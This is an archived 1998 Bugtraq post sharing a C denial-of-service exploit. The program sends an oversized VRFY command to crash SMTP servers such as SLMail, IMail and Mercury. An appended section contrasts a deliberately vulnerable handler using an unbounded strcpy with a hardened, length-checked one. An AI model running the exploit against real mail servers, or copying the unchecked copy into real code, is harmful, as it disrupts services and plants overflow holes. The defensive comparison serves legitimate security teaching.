Bugtraq mailing list archives
smtp overflows
From: steven () EFNI COM (Jon Beaton)
Date: Wed, 8 Apr 1998 07:10:25 -0400
There have been more posts about the buffer overflows on SMTP daemons, so I thought this may be useful. After posting about these attacks on SLMail and IMail, I found that there were a lot more that were still affected. On the few I've tried on the Mac, like Mercury, it locked the server up, much like AppleShare. Anyway, this is just mdaemon.c with a few tiny changes; I just thought it may be useful. Btw, I just wanted to note that this will also crash IMail, even though the author has said it wasn't affected.

Jon

/* mdaemon.c with a few small changes.
   known to lock up the whole server with some daemons on the Mac
   Cisc0 @ Undernet */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

int main(int argc, char *argv[])
{
    struct sockaddr_in sin;
    struct hostent *hp;
    char *buffer;
    int sock, i;

    if (argc != 2) {
        printf("usage: %s <smtp server>\n", argv[0]);
        exit(1);
    }

    hp = gethostbyname(argv[1]);
    if (hp == NULL) {
        printf("Unknown host: %s\n", argv[1]);
        exit(1);
    }

    /* build the destination address: resolved host, TCP port 25 */
    memset(&sin, 0, sizeof(sin));
    memcpy(&sin.sin_addr, hp->h_addr, hp->h_length);
    sin.sin_family = hp->h_addrtype;
    sin.sin_port = htons(25);

    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock < 0) {
        perror("socket");
        exit(1);
    }
    if (connect(sock, (struct sockaddr *) &sin, sizeof(sin)) < 0) {
        perror("connect");
        exit(1);
    }

    /* "VRFY " followed by 896 'd's and CRLF: an oversized argument that
       overflows the daemon's fixed-size command buffer (903 bytes total,
       well inside the 1000 allocated here) */
    buffer = (char *) malloc(1000);
    if (buffer == NULL) {
        perror("malloc");
        exit(1);
    }
    strcpy(buffer, "VRFY ");
    for (i = 0; i < 896; i++)
        strcat(buffer, "d");
    strcat(buffer, "\r\n");

    write(sock, buffer, strlen(buffer));
    close(sock);
    free(buffer);
    return 0;
}
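The daemon-side view of the bug the post is probing, as an added example that is not part of Jon's message or any of the named products' code: a handler that copies the VRFY argument into a fixed stack buffer with no length check (the pattern that an 896-byte argument overflows), beside a hardened handler that validates the command, bounds the line and argument lengths, and only then copies. The limits MAX_LINE (the RFC 821 command-line maximum) and MAX_VRFY_ARG, the reply texts, and build_vrfy_probe (which rebuilds the exact "VRFY " + 896 x 'd' + CRLF line the posted tool sends) are this example's own assumptions, not taken from any real daemon.

```c
#include <stdio.h>
#include <string.h>
#include <strings.h>

/* Assumed limits for this example (not from any real daemon):
 * RFC 821 caps an SMTP command line at 512 bytes including CRLF;
 * 64 is a plausible cap for a mailbox name handed to VRFY. */
#define MAX_LINE     512
#define MAX_VRFY_ARG 64

/* The unsafe pattern: fixed stack buffer, unbounded copy.
 * Called with the post's 896-byte argument this writes ~830 bytes past
 * `user` and smashes the stack; main() below only feeds it a short line. */
int handle_vrfy_unsafe(const char *line)
{
    char user[MAX_VRFY_ARG];
    strcpy(user, line + 5);          /* no length check before the copy */
    return (int) strlen(user);
}

/* Hardened handler: check the total line length, the command keyword and
 * the argument length *before* anything is copied. Returns the SMTP reply
 * code and writes the full reply line into `reply`. */
int handle_vrfy_safe(const char *line, char *reply, size_t replysz)
{
    char user[MAX_VRFY_ARG + 1];
    size_t len;

    if (strlen(line) > MAX_LINE) {
        snprintf(reply, replysz, "500 Line too long\r\n");
        return 500;
    }
    if (strncasecmp(line, "VRFY ", 5) != 0) {
        snprintf(reply, replysz, "500 Syntax error, command unrecognized\r\n");
        return 500;
    }
    line += 5;
    len = strcspn(line, "\r\n");     /* argument runs up to CRLF */
    if (len == 0) {
        snprintf(reply, replysz, "501 Syntax error in parameters\r\n");
        return 501;
    }
    if (len > MAX_VRFY_ARG) {
        snprintf(reply, replysz, "501 Argument too long\r\n");
        return 501;
    }
    memcpy(user, line, len);         /* bounded: len <= MAX_VRFY_ARG */
    user[len] = '\0';
    /* 252 (RFC 2821 3.5.3) neither confirms nor denies the mailbox */
    snprintf(reply, replysz,
             "252 Cannot VRFY user <%s>, but will accept message\r\n", user);
    return 252;
}

/* Rebuild the probe line the posted tool sends: "VRFY " + n * 'd' + CRLF.
 * Returns the line length, or 0 if it does not fit in `out`. */
size_t build_vrfy_probe(char *out, size_t outsz, size_t n)
{
    size_t need = 5 + n + 2;
    if (need + 1 > outsz)
        return 0;
    memcpy(out, "VRFY ", 5);
    memset(out + 5, 'd', n);
    memcpy(out + 5 + n, "\r\n", 2);
    out[need] = '\0';
    return need;
}

int main(void)
{
    char probe[1000], reply[128];
    size_t n = build_vrfy_probe(probe, sizeof probe, 896);   /* 903 bytes */
    int code;

    code = handle_vrfy_safe(probe, reply, sizeof reply);
    printf("probe of %zu bytes -> %d %s", n, code, reply + 4);

    code = handle_vrfy_safe("VRFY postmaster\r\n", reply, sizeof reply);
    printf("short argument    -> %d %s", code, reply + 4);

    /* the unsafe handler is only exercised with input that fits */
    printf("unsafe handler copied %d bytes\n",
           handle_vrfy_unsafe("VRFY postmaster\r\n"));
    return 0;
}
```

The hardened handler rejects the 903-byte probe on the line-length check alone, and a shorter but still oversized argument on the argument check; both checks happen before the copy, which is the property the vulnerable daemons lacked.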